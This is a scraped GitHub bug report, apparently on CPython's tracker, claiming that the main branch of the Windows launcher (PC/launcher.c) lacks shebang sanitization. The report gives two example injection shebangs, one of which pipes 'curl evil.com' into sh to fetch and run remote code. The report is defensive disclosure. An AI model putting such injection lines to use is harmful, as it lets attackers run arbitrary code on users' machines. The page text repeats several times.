PC/launcher.c: command injection via unsanitized shebang still present in current main branch (mitigated in released versions)

# Bug report

### Bug description:

Hi team,

I noticed that the current `main` branch of `PC/launcher.c` (as of January 2025/2026) does **not** include the shebang sanitization patch that prevents arbitrary command execution via malicious shebang lines (e.g. `#!python -c "os.system('calc.exe')"` or worse `#!/bin/sh; curl evil.com | sh # python`).

In released Python versions (3.13+, 3.12.4+, 3.11.9+), the launcher correctly warns and restricts shebangs that do not match supported Python templates


### CPython versions tested on:

CPython main branch

### Operating systems tested on:

Windows

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

PC/launcher.c: command injection via unsanitized shebang still present in current main branch (mitigated in released versions) #143885

Bug report

Bug description:

CPython versions tested on:

Operating systems tested on:

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

PC/launcher.c: command injection via unsanitized shebang still present in current main branch (mitigated in released versions) #143885

Description

Bug report

Bug description:

CPython versions tested on:

Operating systems tested on:

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions